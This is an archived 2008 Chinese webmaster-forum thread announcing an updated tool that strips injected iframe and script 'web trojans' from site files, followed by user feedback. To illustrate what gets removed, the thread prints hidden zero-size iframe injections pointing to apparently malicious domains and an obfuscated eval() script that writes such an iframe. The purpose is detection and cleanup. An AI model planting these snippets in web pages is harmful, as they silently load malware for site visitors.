落伍者站长论坛's Archiver

webfly 发表于 2008-7-22 22:33

ifraMe大小写变形、script网马清理器最新版(2008.07.22更新)

ifraMe大小写变形、script网马清理器最新版(2008.07.22更新)

有什么bug大家给我反馈下~谢谢

使用说明:
本软件专门清理iframe大小写混合网页马,比如要清理掉以下内容:
<ifraMe src=http://aaa.77xxmm.cn/new858.htm?075 width=0 nAme='5302'
height=0></ifrAme>
<iframe src=http://ppp.749571.com/ww/new05.htm?013 width=1 height=1></iframe>

网页木马关键词:77xxmm.cn,然后点搜索,搜索完毕后点清理木马
一个关键词清理完了,可以换个关键词:749571.com,再点清理木马

更新了一个版本:最新版支持iframe大小写木马,script形式挂马清,理默认后缀增加了php和inc,本次提供的是

2008.5.20再次更新:增加自定义正则规则功能,增加清理如下木马功能
[ifRame src=http://www.oiok01.net/s1.htm?bei wIdth=1 name='9589' height=1][/iframe]
2008.7.21 修正替换后产生空行的问题,增加关键词、搜索路径自动保存功能
2008.7.22 增加高级搜索功能,增加目录监控功能,自动清理木马

下载地址:[url]http://www.wesoho.com/soft/down/ClearTrojan.rar[/url]
[attach]27752[/attach]

oklrc 发表于 2008-7-23 08:53

感谢提供!

likui232 发表于 2008-7-27 15:10

感谢LZ老大!已经在服务器挂着监控了,建议个时时监控的日志别一直增加,做成只显示前200条就差不多了。再强大点的话,收费我也愿意了!支持你!

spidergood 发表于 2008-7-31 16:22

:D   非常好呀,我还一直用你的第一个版本的,想不到都升级到这个版本,真不错,

lgwpc 发表于 2008-7-31 16:51

顶~好东西,下载了.
一定要填关键字?

webfly 发表于 2008-8-4 10:13

基于关键字的,现在还比较弱,单关键字,准备做成多关键字的

webfly 发表于 2008-8-4 10:14

[quote]原帖由 [i]likui232[/i] 于 2008-7-27 15:10 发表 [url=http://www.im286.com/redirect.php?goto=findpost&pid=28101097&ptid=2756445][img]http://www.im286.com/images/common/back.gif[/img][/url]
感谢LZ老大!已经在服务器挂着监控了,建议个时时监控的日志别一直增加,做成只显示前200条就差不多了。再强大点的话,收费我也愿意了!支持你! [/quote]
多提意见,不想收费~~

likui232 发表于 2008-8-4 12:50

[code]eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4.3("<1 2=5:\\/\\/9.6\\/ 8=0 7=0><\\/1>")',10,10,'|iframe|src|writeln|document|http|cn|height|width|nsuper'.split('|'),0,{}))[/code]这样的挂马方式该如何写正则?:( 麻烦您了!

webfly 发表于 2008-8-17 17:10

2008.08.17版本已经更新,请大家下载新版本,新版本增加特殊符号处理,应对新式网页木马挂马方式

小坏 发表于 2008-8-18 00:38

回复 8楼 likui232 的帖子

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4.3("<1 2=5:\\/\\/9.6\\/ 8=0 7=0><\\/1>")',10,10,'|iframe|src|writeln|document|http|cn|height|width|nsuper'.split('|'),0,{}))

this is encode,写规则只需要禁止掉iframe等函数即可,但是新的挂马方式一般没iframe那么简单,
不知道楼主有没考虑过,挂JS,GIF等的要多的多。iframe只是一种很常见的挂马方式。
PS:最重要的是站长们自己的安全意思要提高。[attach]28724[/attach]发个简单的工具,和楼主的基本相同的

[[i] 本帖最后由 小坏 于 2008-8-18 00:42 编辑 [/i]]

webfly 发表于 2008-8-18 08:41

查找替换工具最棒的是这个“Advanced Find and Replace”,如果你喜欢这类工具推荐使用这个~~

anyliz 发表于 2008-8-19 13:01

:) 很好

页: [1]

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.